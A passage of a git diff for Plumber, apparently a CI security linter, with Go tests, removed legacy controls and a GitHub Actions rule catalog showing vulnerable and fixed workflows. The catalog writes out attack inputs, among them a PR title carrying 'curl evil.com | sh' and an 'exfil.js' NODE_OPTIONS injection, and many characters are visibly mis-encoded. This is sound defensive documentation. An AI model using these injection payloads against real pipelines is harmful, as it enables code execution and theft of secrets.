+ if err := os.WriteFile(filepath.Join(wfDir, "ci.yml"), []byte(workflow), 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ enabled := true
+ conf := &configuration.Configuration{
+ ProjectPath: "owner/repo",
+ Branch: "main",
+ GitRepoRoot: tmp,
+ PlumberConfig: &configuration.PlumberConfig{
+ Controls: configuration.ControlsConfig{
+ ContainerImageMustNotUseForbiddenTags: &configuration.ImageForbiddenTagsControlConfig{
+ Enabled: &enabled,
+ Tags: []string{"latest"},
+ },
+ },
+ Engine: &configuration.EngineConfig{Enabled: &enabled},
+ },
+ }
+
+ result, err := RunGitHubAnalysis(conf)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if result == nil {
+ t.Fatal("expected result, got nil")
+ }
+ if !result.CiValid {
+ t.Error("expected CiValid=true (jobs discovered)")
+ }
+ if result.CiMissing {
+ t.Error("expected CiMissing=false")
+ }
+
+ hits := map[string]int{}
+ for _, f := range result.Findings {
+ hits[f.Code+":"+f.Job]++
+ }
+ // alpine:latest on ci/lint must flag; node:20.10.0 on ci/test must not.
+ if hits["ISSUE-102:ci/lint"] != 1 {
+ t.Errorf("expected 1 ISSUE-102 on ci/lint, got %+v", hits)
+ }
+ if hits["ISSUE-102:ci/test"] != 0 {
+ t.Errorf("unexpected finding on ci/test, got %+v", hits)
+ }
+ // Test asserts on ISSUE-102 only — unrelated defaults-on rules
+ // (ISSUE-304 undocumented permissions, ISSUE-602 no concurrency,
+ // …) also fire on this intentionally-minimal fixture and are
+ // tracked in their own suites.
+ if hits["ISSUE-102:ci/lint"]+hits["ISSUE-102:ci/test"] != 1 {
+ t.Errorf("expected exactly 1 ISSUE-102 finding, got %+v", hits)
+ }
+}
+
+// TestRunGitHubAnalysis_NoWorkflows verifies the empty-repo path: with
+// no workflow files present, RunGitHubAnalysis must return a result
+// (not an error) with CiValid=false, CiMissing=true and zero findings.
+func TestRunGitHubAnalysis_NoWorkflows(t *testing.T) {
+ tmp := t.TempDir()
+ conf := &configuration.Configuration{
+ ProjectPath: "owner/repo",
+ GitRepoRoot: tmp,
+ PlumberConfig: &configuration.PlumberConfig{},
+ }
+
+ result, err := RunGitHubAnalysis(conf)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if result.CiValid {
+ t.Error("expected CiValid=false when no workflows")
+ }
+ if !result.CiMissing {
+ t.Error("expected CiMissing=true when no workflows")
+ }
+ if len(result.Findings) != 0 {
+ t.Errorf("expected no findings, got %d", len(result.Findings))
+ }
+}
diff --git a/control/testmain_test.go b/control/testmain_test.go
new file mode 100644
index 0000000..1ce8a52
--- /dev/null
+++ b/control/testmain_test.go
@@ -0,0 +1,16 @@
+package control
+
+import (
+ "os"
+ "testing"
+)
+
+// TestMain disables the collector's GitHub API metadata enrichment
+// globally for the control package's tests by setting
+// PLUMBER_DISABLE_GITHUB_API=1 before any test runs, so tests do not
+// depend on network access. See the matching file under policies/ for
+// the rationale.
+func TestMain(m *testing.M) {
+ if err := os.Setenv("PLUMBER_DISABLE_GITHUB_API", "1"); err != nil {
+ panic(err)
+ }
+ os.Exit(m.Run())
+}
diff --git a/control/types.go b/control/types.go
index 4cc7a14..b16bf44 100644
--- a/control/types.go
+++ b/control/types.go
@@ -2,6 +2,7 @@ package control
import (
"github.com/getplumber/plumber/collector"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
"github.com/sirupsen/logrus"
)
@@ -26,25 +27,17 @@ type AnalysisResult struct {
// Pipeline image data
PipelineImageMetrics *PipelineImageMetricsSummary `json:"pipelineImageMetrics,omitempty"`
- // Control results
- ImageForbiddenTagsResult *GitlabImageForbiddenTagsResult `json:"imageForbiddenTagsResult,omitempty"`
- ImageAuthorizedSourcesResult *GitlabImageAuthorizedSourcesResult `json:"imageAuthorizedSourcesResult,omitempty"`
- BranchProtectionResult *GitlabBranchProtectionResult `json:"branchProtectionResult,omitempty"`
- HardcodedJobsResult *GitlabPipelineHardcodedJobsResult `json:"hardcodedJobsResult,omitempty"`
- OutdatedIncludesResult *GitlabPipelineIncludesOutdatedResult `json:"outdatedIncludesResult,omitempty"`
- ForbiddenVersionsIncludesResult *GitlabPipelineIncludesForbiddenVersionResult `json:"forbiddenVersionsIncludesResult,omitempty"`
- RequiredComponentsResult *GitlabPipelineRequiredComponentsResult `json:"requiredComponentsResult,omitempty"`
- RequiredTemplatesResult *GitlabPipelineRequiredTemplatesResult `json:"requiredTemplatesResult,omitempty"`
- DebugTraceResult *GitlabPipelineDebugTraceResult `json:"debugTraceResult,omitempty"`
- VariableInjectionResult *GitlabPipelineVariableInjectionResult `json:"variableInjectionResult,omitempty"`
- SecurityJobsWeakenedResult *GitlabSecurityJobsWeakenedResult `json:"securityJobsWeakenedResult,omitempty"`
- UnverifiedScriptsResult *GitlabPipelineUnverifiedScriptsResult `json:"unverifiedScriptsResult,omitempty"`
- JobVariablesOverrideResult *GitlabPipelineJobVariablesOverrideResult `json:"jobVariablesOverrideResult,omitempty"`
- DockerInDockerResult *GitlabPipelineDockerInDockerResult `json:"dockerInDockerResult,omitempty"`
-
- // Raw collected data (not included in JSON output, used for PBOM generation)
- PipelineImageData *collector.GitlabPipelineImageData `json:"-"`
- PipelineOriginData *collector.GitlabPipelineOriginData `json:"-"`
+ // Findings from the Rego/OPA rule engine. Single source of truth
+ // for compliance results since all legacy Go controls were retired
+ // (see docs/REFACTOR_MULTI_PROVIDER.md §8 Phase A).
+ Findings []opaengine.Finding `json:"findings,omitempty"`
+
+ // Raw collected data (not included in JSON output, used for PBOM generation
+ // and for the per-control aggregated stats block printed under each
+ // control header in the terminal output).
+ PipelineImageData *collector.GitlabPipelineImageData `json:"-"`
+ PipelineOriginData *collector.GitlabPipelineOriginData `json:"-"`
+ ProtectionData *collector.GitlabProtectionAnalysisData `json:"-"`
}
// PipelineOriginMetricsSummary is a simplified version of origin metrics for output
diff --git a/control/utils.go b/control/utils.go
deleted file mode 100644
index f51566d..0000000
--- a/control/utils.go
+++ /dev/null
@@ -1,103 +0,0 @@
-package control
-
-import (
- "encoding/json"
- "fmt"
- "regexp"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/utils"
-)
-
-// overridesRegex matches forbidden override keywords in a job's JSON representation.
-// These are CI/CD keywords that, when present in the hardcoded (overridden) content,
-// indicate the user has meaningfully overridden a component/template's behavior.
-const overridesRegex = `(?i)"(after_script|allow_failure|artifacts|before_script|cache|coverage|dast_configuration|dependencies|environment|identity|image|inherit|interruptible|manual_confirmation|needs|pages|parallel|release|resource_group|retry|rules|script|secrets|services|stage|tags|timeout|trigger|when)":`
-
-var compiledOverridesRegex = regexp.MustCompile(overridesRegex)
-
-
-// getOriginOverriddenJobs returns per-job override details for an origin.
-// Jobs are deduplicated by name (the same job can appear multiple times
-// in an origin's Jobs slice from both direct and extends-based matching).
-// Returns nil if no jobs have forbidden overrides.
-func getOriginOverriddenJobs(origin *collector.GitlabPipelineOriginDataFull, data *collector.GitlabPipelineOriginData) []utils.OverriddenJobDetail {
- seen := make(map[string]bool)
- var details []utils.OverriddenJobDetail
- for _, job := range origin.Jobs {
- if job.IsOverridden && !seen[job.Name] {
- seen[job.Name] = true
- keys := getForbiddenOverrideKeys(data.JobHardcodedContent[job.Name])
- if len(keys) > 0 {
- details = append(details, utils.OverriddenJobDetail{
- JobName: job.Name,
- OverriddenKeys: keys,
- })
- }
- }
- }
- return details
-}
-
-// getForbiddenOverrideKeys returns the list of forbidden CI/CD keywords found
-// in a job's hardcoded (overridden) content. Returns nil if none are found.
-func getForbiddenOverrideKeys(job interface{}) []string {
- if job == nil {
- return nil
- }
-
- serializable := convertToSerializable(job)
-
- jobJSON, err := json.Marshal(serializable)
- if err != nil {
- l.WithError(err).WithField("job", job).Error("Unable to marshal job content to JSON for override check")
- return nil
- }
-
- matches := compiledOverridesRegex.FindAllSubmatch(jobJSON, -1)
- if len(matches) == 0 {
- return nil
- }
-
- seen := make(map[string]bool)
- var keys []string
- for _, m := range matches {
- key := string(m[1])
- if !seen[key] {
- seen[key] = true
- keys = append(keys, key)
- }
- }
- return keys
-}
-
-// convertToSerializable converts a map[interface{}]interface{} to map[string]interface{}
-// recursively to make it JSON serializable (YAML unmarshalling produces the former).
-func convertToSerializable(input interface{}) interface{} {
- switch v := input.(type) {
- case map[interface{}]interface{}:
- result := make(map[string]interface{})
- for key, value := range v {
- keyStr, ok := key.(string)
- if !ok {
- keyStr = fmt.Sprintf("%v", key)
- }
- result[keyStr] = convertToSerializable(value)
- }
- return result
- case map[string]interface{}:
- result := make(map[string]interface{})
- for key, value := range v {
- result[key] = convertToSerializable(value)
- }
- return result
- case []interface{}:
- result := make([]interface{}, len(v))
- for i, item := range v {
- result[i] = convertToSerializable(item)
- }
- return result
- default:
- return v
- }
-}
diff --git a/docs/GITHUB_ISSUES.md b/docs/GITHUB_ISSUES.md
new file mode 100644
index 0000000..dd25b6f
--- /dev/null
+++ b/docs/GITHUB_ISSUES.md
@@ -0,0 +1,1565 @@
+# GitHub Actions rule catalog
+
+Reference for every rule Plumber runs against GitHub Actions
+workflows. Each entry gives the trigger, the risk, and a compilable
+**before / after** remediation so you can drop the fix in without
+reading the upstream docs.
+
+## Table of contents
+
+### Supply chain — `1xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-102](#issue-102--image-mutable-tag) | `image-mutable-tag` | high |
+| [ISSUE-103](#issue-103--image-not-pinned-by-digest) | `image-not-pinned-by-digest` | high |
+| [ISSUE-104](#issue-104--action-unpinned) | `action-unpinned` | high |
+| [ISSUE-105](#issue-105--container-hardcoded-credentials) | `container-hardcoded-credentials` | **critical** |
+| [ISSUE-106](#issue-106--cache-poisoning) | `cache-poisoning` | high |
+| [ISSUE-107](#issue-107--dockerfile-unpinned-base) | `dockerfile-unpinned-base` | medium |
+| [ISSUE-108](#issue-108--action-archived-repo) | `action-archived-repo` | high _(API)_ |
+| [ISSUE-109](#issue-109--impostor-commit) | `impostor-commit` | **critical** _(API)_ |
+| [ISSUE-110](#issue-110--ref-version-mismatch) | `ref-version-mismatch` | medium _(API)_ |
+| [ISSUE-111](#issue-111--stale-action-ref) | `stale-action-ref` | low _(API)_ |
+| [ISSUE-112](#issue-112--release-workflow-unsigned) | `release-workflow-unsigned` | medium |
+| [ISSUE-113](#issue-113--ref-confusion) | `ref-confusion` | medium _(API)_ |
+| [ISSUE-114](#issue-114--known-vulnerable-action) | `known-vulnerable-action` | **critical** _(API)_ |
+| [ISSUE-115](#issue-115--superfluous-action) | `superfluous-action` | low |
+
+### Expressions & injections — `2xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-206](#issue-206--template-injection) | `template-injection` | **critical** |
+| [ISSUE-208](#issue-208--insecure-commands) | `insecure-commands` | high |
+| [ISSUE-209](#issue-209--github-env-injection) | `github-env-injection` | **critical** |
+| [ISSUE-210](#issue-210--bot-conditions) | `bot-conditions` | high |
+| [ISSUE-211](#issue-211--unsound-condition) | `unsound-condition` | medium |
+| [ISSUE-212](#issue-212--unsound-contains) | `unsound-contains` | medium |
+| [ISSUE-213](#issue-213--unsafe-github-context-dump) | `unsafe-github-context-dump` | high |
+| [ISSUE-214](#issue-214--unpinned-package-install) | `unpinned-package-install` | medium |
+| [ISSUE-215](#issue-215--template-injection-vars) | `template-injection-vars` | low |
+
+### Secrets, credentials & permissions — `3xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-301](#issue-301--overprovisioned-secrets) | `overprovisioned-secrets` | **critical** |
+| [ISSUE-302](#issue-302--secrets-inherit) | `secrets-inherit` | high |
+| [ISSUE-303](#issue-303--unredacted-secrets) | `unredacted-secrets` | high |
+| [ISSUE-304](#issue-304--undocumented-permissions) | `undocumented-permissions` | medium |
+| [ISSUE-305](#issue-305--secrets-outside-env) | `secrets-outside-env` | medium |
+| [ISSUE-306](#issue-306--github-app-skip-revoke) | `github-app-skip-revoke` | high |
+| [ISSUE-307](#issue-307--artipacked) | `artipacked` | high |
+| [ISSUE-308](#issue-308--secrets-dynamic-index) | `secrets-dynamic-index` | low |
+
+### Triggers & composition — `4xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-414](#issue-414--dangerous-triggers) | `dangerous-triggers` | **critical** |
+| [ISSUE-415](#issue-415--pull-request-target-with-head-checkout) | `pull-request-target-with-head-checkout` | **critical** |
+
+### Access & authorisation — `5xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-509](#issue-509--excessive-permissions) | `excessive-permissions` | high |
+
+### Workflow hygiene — `6xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-601](#issue-601--anonymous-definition) | `anonymous-definition` | low |
+| [ISSUE-602](#issue-602--missing-concurrency) | `missing-concurrency` | medium |
+| [ISSUE-603](#issue-603--workflow-misfeature) | `workflow-misfeature` | medium |
+| [ISSUE-604](#issue-604--workflow-obfuscation) | `workflow-obfuscation` | high |
+| [ISSUE-605](#issue-605--use-trusted-publishing) | `use-trusted-publishing` | high |
+| [ISSUE-606](#issue-606--dependabot-insecure-exec) | `dependabot-insecure-exec` | **critical** |
+| [ISSUE-607](#issue-607--dependabot-missing-cooldown) | `dependabot-missing-cooldown` | low |
+| [ISSUE-608](#issue-608--dependency-update-tool-missing) | `dependency-update-tool-missing` | medium |
+| [ISSUE-609](#issue-609--sast-workflow-missing) | `sast-workflow-missing` | low |
+| [ISSUE-610](#issue-610--security-policy-missing) | `security-policy-missing` | low |
+
+### Run / output conventions
+
+- Every finding prints a clickable `↳ at <file>:<line>` — `Ctrl+click`
+ in a VS Code terminal opens the exact job.
+- Severity counts drive the **Plumber score** (A–E). Rules tagged
+ _(API)_ call GitHub through `gh` and stay silent when `gh auth login`
+ has not been set up.
+- To turn a rule off, either disable its `ControlName` in
+ `.plumber.yaml` or pass `--skip-controls <codes>`. The
+ mapping lives in [`control/codes.go`](../control/codes.go).
+
+---
+
+## ISSUE-102 β `image-mutable-tag`
+
+**Severity:** `high` β’ **Control:** `containerImageMustNotUseForbiddenTags`
+
+A job's `container.image` uses a tag that appears in the configured
+forbidden list (`latest`, `dev`, `main`, glob patterns). Mutable tags
+let the registry maintainer β or an attacker who compromises the
+registry β swap the image under the job's feet.
+
+```yaml
+# β before
+jobs:
+ build:
+ container: node:latest
+ runs-on: ubuntu-latest
+```
+
+```yaml
+# ✅ after — immutable tag
+jobs:
+ build:
+ container: node:20.11.0
+ runs-on: ubuntu-latest
+```
+
+**Config.** `containerImageMustNotUseForbiddenTags.tags` β list of tags
+to forbid.
+
+---
+
+## ISSUE-103 β `image-not-pinned-by-digest`
+
+**Severity:** `high` β’ **Control:** `containerImageMustNotUseForbiddenTags`
+
+When `containerImagesMustBePinnedByDigest: true`, every `container:`
+image must carry a `@sha256:β¦` digest. Even a version tag like
+`20.11.0` can be re-pushed by the registry owner; only the digest is
+cryptographically stable.
+
+```yaml
+# β before
+jobs:
+ build:
+ container: node:20.11.0
+```
+
+```yaml
+# ✅ after — digest pin
+jobs:
+ build:
+ container: node:20.11.0@sha256:8b9bc5f36ba5c7c4b3f1e6d0c7a2e9f8b3d1c0a9b2e3c4d5f6a7b8c9d0e1f2a3
+```
+
+Tip: `docker inspect --format='{{index .RepoDigests 0}}' node:20.11.0`
+prints the digest for the tag you just pulled.
+
+---
+
+## ISSUE-104 β `action-unpinned`
+
+**Severity:** `high` β’ **Control:** `actionsMustBePinnedByCommitSha`
+
+A workflow step references a third-party action with a mutable ref β
+a tag (`@v4`) or a branch (`@main`). Tags and branches are mutable: the
+maintainer can retag them, and anyone who compromises the maintainer
+account can too. The **tj-actions/changed-files** compromise of March
+2025 (CVE-2025-30066) propagated exactly this way across hundreds of
+repos.
+
+```yaml
+# β before
+- uses: peaceiris/actions-gh-pages@v3
+```
+
+```yaml
+# ✅ after — 40-char commit SHA + documenting comment
+- uses: peaceiris/actions-gh-pages@4f9cc6602b3c52e6dd3ff78e1a74bbf0d0a45c9a # v3.9.3
+```
+
+**Config.** Enabled by default in the generated `.plumber.yaml`.
+`trustedOwners: [actions, github]` exempts first-party GitHub-owned
+actions so the initial signal stays focused on the third-party
+surface. Pair with Dependabot
+(`version-update-strategy: sha-and-version`) to keep pins fresh, or
+set `enabled: false` on projects that are not yet ready to migrate.
+
+---
+
+## ISSUE-105 β `container-hardcoded-credentials`
+
+**Severity:** `critical` β’ **Control:** `containerCredentialsMustComeFromSecrets`
+
+`container.credentials.password` is a plain string committed to git
+history. Anyone with clone access β including the entire public on a
+public repo β can retrieve it; rotation means rewriting history.
+
+```yaml
+# β before
+jobs:
+ build:
+ container:
+ image: ghcr.io/org/private:latest
+ credentials:
+ username: myuser
+ password: hunter2
+```
+
+```yaml
+# ✅ after — secret reference
+jobs:
+ build:
+ container:
+ image: ghcr.io/org/private:latest
+ credentials:
+ username: ${{ secrets.DOCKER_USERNAME }}
+ password: ${{ secrets.DOCKER_PASSWORD }}
+```
+
+---
+
+## ISSUE-106 β `cache-poisoning`
+
+**Severity:** `high` β’ **Control:** `releaseWorkflowsMustNotRestoreUntrustedCache`
+
+A release or publish job restores a build cache whose key is not scoped
+to the release ref. GitHub caches are shared across branches: a PR on
+any feature branch can populate the same key that the release run later
+restores, silently injecting compiled artefacts into the published
+package. Real attacks have abused this path against PyPI and npm.
+
+```yaml
+# β before β cache key shared with every branch
+on: [release]
+jobs:
+ publish:
+ steps:
+ - uses: actions/cache@v4
+ with:
+ key: deps-${{ hashFiles('**/package-lock.json') }}
+ path: ~/.npm
+ - uses: JS-DevTools/npm-publish@v3
+```
+
+```yaml
+# ✅ after — key weaves github.ref_name so PR caches cannot win
+on: [release]
+jobs:
+ publish:
+ steps:
+ - uses: actions/cache@v4
+ with:
+ key: release-${{ github.ref_name }}-${{ hashFiles('**/package-lock.json') }}
+ path: ~/.npm
+ - uses: JS-DevTools/npm-publish@v3
+```
+
+---
+
+## ISSUE-107 β `dockerfile-unpinned-base`
+
+**Severity:** `medium` β’ **Control:** `dockerfilesMustPinBaseImageByDigest`
+
+A repository Dockerfile uses `FROM image:tag` without an immutable
+`@sha256:β¦` digest. Tags are mutable at the registry level: an
+attacker who compromises the registry β or the image maintainer β
+can re-push the same tag to point at a different layer, silently
+injecting code into every subsequent build. Digest pinning is the
+single control that neutralises this vector.
+
+```dockerfile
+# β before β tag can be re-pushed under your feet
+FROM alpine:3.20
+```
+
+```dockerfile
+# ✅ after — digest pin, immutable
+FROM alpine:3.20@sha256:b7d40c02c23be0ca99da3a0e5e8bd2f0a0a2b3a0e5e8bd2f0a0a2b3a0e5e8bd2
+```
+
+`docker inspect --format='{{index .RepoDigests 0}}' alpine:3.20`
+prints the digest for the tag you just pulled. Automate refresh
+with Dependabot (`package-ecosystem: docker`) or Renovate
+(`pinDigests: true`) so the pin stays current.
+
+---
+
+## ISSUE-108 β `action-archived-repo`
+
+**Severity:** `high` _(API)_ β’ **Control:** `actionsMustNotBeArchived`
+
+The upstream repository hosting the action is archived. No more
+security patches, no more compatibility updates β every existing CVE
+stays open forever. Pinning by SHA does not help: a stray push by the
+last maintainer is still possible.
+
+```yaml
+# β before β action hosted in an archived repo
+- uses: some-abandoned-org/stale-helper@v1
+```
+
+```yaml
+# ✅ after — audited, maintained fork (or inline the step)
+- uses: my-org/stale-helper@17d1c24β¦ # v1.2.1 β fork audited 2026-04
+```
+
+---
+
+## ISSUE-109 β `impostor-commit`
+
+**Severity:** `critical` _(API)_ β’ **Control:** `actionRefsMustExistUpstream`
+
+The SHA the workflow pins does not exist in the action's upstream
+repository. Two possible roots:
+
+1. A typo β the runner silently falls back to the default branch.
+2. The `impostor commit` attack class documented in academic supply
+ chain research: a SHA visible in a PR comment or stargazer URL,
+ never merged upstream.
+
+Either way, the review trusted a SHA the repository never approved.
+
+```yaml
+# β before β SHA does not resolve in actions/checkout
+- uses: actions/checkout@deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
+```
+
+```yaml
+# ✅ after — verify with `gh api repos/<owner>/<repo>/commits/<sha>`
+- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.1.7
+```
+
+---
+
+## ISSUE-110 β `ref-version-mismatch`
+
+**Severity:** `medium` _(API)_ β’ **Control:** `actionPinCommentsMustMatchSha`
+
+The `# vX.Y.Z` comment trailing a SHA-pinned `uses:` names a version
+that does not match the SHA. Reviewers scan diffs and trust the
+annotation β a silent downgrade slips through unnoticed.
+
+```yaml
+# β before β SHA resolves to v3.5.0 but the comment lies
+- uses: actions/checkout@8e5e7e5ab8b370d6c329ec480221332ada57f0ab # v4.1.0
+```
+
+```yaml
+# ✅ after — SHA and comment aligned
+- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.1.7
+```
+
+---
+
+## ISSUE-111 β `stale-action-ref`
+
+**Severity:** `low` _(API)_ β’ **Control:** `actionPinsMustNotBeStale`
+
+The pinned SHA is behind the latest upstream release. The pin still
+works, but it misses the security fixes, dependency bumps and runtime
+compatibility changes shipped since.
+
+```yaml
+# β before β pin is 14 months behind latest
+- uses: actions/checkout@72f2cec99f417b1a1c5e2e88945068983b7965f9 # v4.1.1
+```
+
+```yaml
+# ✅ after — latest release, handled by Dependabot
+- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.1.7
+```
+
+Configure Dependabot with `version-update-strategy: sha-and-version`
+to automate the upgrade loop.
+
+---
+
+## ISSUE-112 β `release-workflow-unsigned`
+
+**Severity:** `medium` β’ **Control:** `releaseWorkflowsMustSignArtefacts`
+
+A release or publish job produces artefacts without any signing
+step. Consumers pulling the release then have no cryptographic
+handle to verify the artefact was built by the expected pipeline
+rather than tampered with along the way (cache poisoning,
+compromised runner, repository takeover).
+
+```yaml
+# β before β release without signing
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: make dist
+ - uses: softprops/action-gh-release@v2
+ with:
+ files: dist/*
+```
+
+```yaml
+# ✅ after — cosign signs each artefact, .sig published alongside
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ permissions:
+ id-token: write
+ contents: write
+ steps:
+ - uses: actions/checkout@v4
+ - uses: sigstore/cosign-installer@v3
+ - run: make dist
+ - run: cosign sign-blob --yes dist/release.tar.gz > dist/release.tar.gz.sig
+ - uses: softprops/action-gh-release@v2
+ with:
+ files: |
+ dist/release.tar.gz
+ dist/release.tar.gz.sig
+```
+
+OIDC-based publish actions with built-in provenance
+(`pypa/gh-action-pypi-publish` with trusted publishing,
+`npm publish --provenance`) are considered self-signing and stay
+silent.
+
+---
+
+## ISSUE-113 β `ref-confusion`
+
+**Severity:** `medium` _(API)_ β’ **Control:** `actionRefsMustNotCollide`
+
+The action's ref resolves upstream as **both a tag and a branch**
+(classic case: a tag `v1` kept alongside a long-lived `v1` branch).
+GitHub Actions resolves tags first, so the reference works today,
+but a later rename / tag deletion / workflow typo silently switches
+the binding. The reviewer cannot tell from the YAML alone which
+revision will run.
+
+```yaml
+# β before β `v1` exists as both a tag AND a branch on the action repo
+- uses: some-org/widget@v1
+```
+
+```yaml
+# ✅ after — 40-char SHA, unambiguous
+- uses: some-org/widget@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0 # v1.0.3
+```
+
+Alternative: ask the action maintainer to drop either the tag or
+the branch. Keeping both is a supply-chain landmine for every
+caller.
+
+---
+
+## ISSUE-114 β `known-vulnerable-action`
+
+**Severity:** `critical` _(API)_ β’ **Control:** `actionsMustNotCarryKnownCVEs`
+
+At least one published entry in the GitHub Advisory Database
+(`ecosystem=actions`) mentions this action. Running a workflow on a
+known-vulnerable release inherits the published vulnerability class
+(RCE, secret exfiltration, privilege escalation). Real-world
+examples: tj-actions/changed-files (CVE-2025-30066), unpatched
+releases of `actions/artifact`.
+
+The finding message carries the full advisory URL for every GHSA
+identifier it matched, so the terminal renderer turns each entry
+into a clickable link:
+
+```text
+CRIT [ISSUE-114] job "build" references "tj-actions/changed-files@v45" —
+ published advisories: GHSA-mrrh-fwg8-r2c3 (https://github.com/advisories/GHSA-mrrh-fwg8-r2c3)
+ ↳ at .github/workflows/ci.yml:28
+ ↳ docs: https://getplumber.io/docs/use-plumber/issues/ISSUE-114
+```
+
+```yaml
+# β before β version carrying GHSA-xxxx-xxxx-xxxx
+- uses: tj-actions/changed-files@v45.0.0
+```
+
+```yaml
+# ✅ after — upgrade past the fixed-in version, SHA-pinned
+- uses: tj-actions/changed-files@<full-commit-sha> # v46.0.1 or later
+```
+
+Tip: `gh api "/advisories?ecosystem=actions&affects=tj-actions/changed-files"`
+lists every advisory known for an action, with the `vulnerable_version_range`
+and `patched_versions` fields.
+
+---
+
+## ISSUE-115 β `superfluous-action`
+
+**Severity:** `low` β’ **Control:** `actionsMustNotDuplicateRunnerBuiltins`
+
+The workflow reaches for a third-party wrapper that duplicates
+functionality already on the runner: `peter-evans/create-pull-request`
+around `gh pr create`, `nick-invision/retry` around a three-line
+bash retry loop, `mikefarah/yq-action` around the `yq` binary
+already on `ubuntu-latest`. Each link is an extra supply-chain
+dependency for zero capability gain.
+
+```yaml
+# β before
+- uses: peter-evans/create-pull-request@v6
+ with:
+ title: automated
+ commit-message: bump
+```
+
+```yaml
+# ✅ after — `gh` does the job, one less dependency
+- env:
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ run: |
+ git checkout -b automated
+ git commit -am "bump"
+ git push -u origin automated
+ gh pr create --title automated --body ""
+```
+
+The curated list (conservative by design) tracks the most common
+offenders; complex actions like `actions/cache` or `setup-*`
+stay off it because they do enough real work to justify the
+dependency.
+
+---
+
+## ISSUE-206 β `template-injection`
+
+**Severity:** `critical` β’ **Control:** `workflowMustNotInjectUserInputInScripts`
+
+A `run:` shell script interpolates `${{ github.event.* }}`,
+`${{ github.head_ref }}` or `${{ github.pull_request.* }}` directly.
+Under a privileged trigger (`pull_request_target`, `workflow_run`)
+those expressions carry PR-author-controlled values; a title crafted
+as `"; curl evil.com | sh #` becomes a shell command with the base
+repo's secrets.
+
+```yaml
+# β before β PR title is pasted straight into the shell
+- run: echo "Title is ${{ github.event.pull_request.title }}"
+```
+
+```yaml
+# ✅ after — env: binding, shell expansion quotes the value
+- env:
+ TITLE: ${{ github.event.pull_request.title }}
+ run: echo "Title is $TITLE"
+```
+
+---
+
+## ISSUE-208 β `insecure-commands`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotReEnableInsecureCommands`
+
+`ACTIONS_ALLOW_UNSECURE_COMMANDS: true` re-enables the deprecated
+`::set-env::` / `::add-path::` workflow commands disabled after
+CVE-2020-15228. Any log line the attacker can influence rewrites the
+running job's environment and PATH.
+
+```yaml
+# β before
+jobs:
+ build:
+ env:
+ ACTIONS_ALLOW_UNSECURE_COMMANDS: "true"
+ steps:
+ - run: echo "::set-env name=PATH::/opt/attack:$PATH"
+```
+
+```yaml
+# ✅ after — validated writes through $GITHUB_ENV / $GITHUB_PATH
+jobs:
+ build:
+ steps:
+ - run: echo "BUILD_MODE=release" >> "$GITHUB_ENV"
+```
+
+---
+
+## ISSUE-209 β `github-env-injection`
+
+**Severity:** `critical` β’ **Control:** `workflowMustNotWriteUntrustedContentToGitHubEnv`
+
+A `run:` step appends a value containing a `${{ github.event.* }}` /
+`head_ref` / `pull_request.*` expression to `$GITHUB_ENV` or
+`$GITHUB_PATH`. Those files are sticky: every following step inherits
+the variables / PATH entries. Injecting `NODE_OPTIONS=--require=./exfil.js`
+hijacks every later Node invocation.
+
+```yaml
+# β before
+- run: echo "PR_TITLE=${{ github.event.pull_request.title }}" >> "$GITHUB_ENV"
+```
+
+```yaml
+# ✅ after — env: binding keeps the template off the redirect line
+- env:
+ TITLE: ${{ github.event.pull_request.title }}
+ run: echo "PR_TITLE=$TITLE" >> "$GITHUB_ENV"
+```
+
+---
+
+## ISSUE-210 β `bot-conditions`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotTrustSpoofableActorChecks`
+
+An `if:` guard tests `github.actor`, `github.triggering_actor`,
+`github.event.sender.login`, etc. Those fields reflect whoever opened
+the PR β spoofable by a fork with a crafted login. The gate the
+author believes is in place does not stop a determined attacker.
+
+```yaml
+# β before β spoofable bot check
+jobs:
+ auto-merge:
+ if: github.actor == 'dependabot[bot]'
+ runs-on: ubuntu-latest
+ steps:
+ - run: gh pr merge --auto --squash "$PR_URL"
+```
+
+```yaml
+# ✅ after — environment-gated approval path
+jobs:
+ auto-merge:
+ environment: dependabot-auto-merge # required reviewers on the env
+ runs-on: ubuntu-latest
+ steps:
+ - run: gh pr merge --auto --squash "$PR_URL"
+```
+
+---
+
+## ISSUE-211 β `unsound-condition`
+
+**Severity:** `medium` β’ **Control:** `workflowConditionsMustBeSound`
+
+A tautology (`always() || β¦`, `true == true`) or a contradiction
+(`false && β¦`) in an `if:`. The gate the author thought they installed
+is silently absent β the job runs unconditionally (tautology) or never
+(contradiction).
+
+```yaml
+# β before β always() short-circuits the OR
+jobs:
+ deploy:
+ if: always() || github.ref == 'refs/heads/main'
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
+```
+
+```yaml
+# ✅ after — the actual gate
+jobs:
+ deploy:
+ if: github.ref == 'refs/heads/main'
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
+```
+
+---
+
+## ISSUE-212 β `unsound-contains`
+
+**Severity:** `medium` β’ **Control:** `workflowContainsCallsMustBeSound`
+
+`contains(literal, expression)` inverts the built-in's signature.
+`contains('main', github.ref)` never matches because `'main'` does not
+contain `refs/heads/main` β the gate stays closed while the reviewer
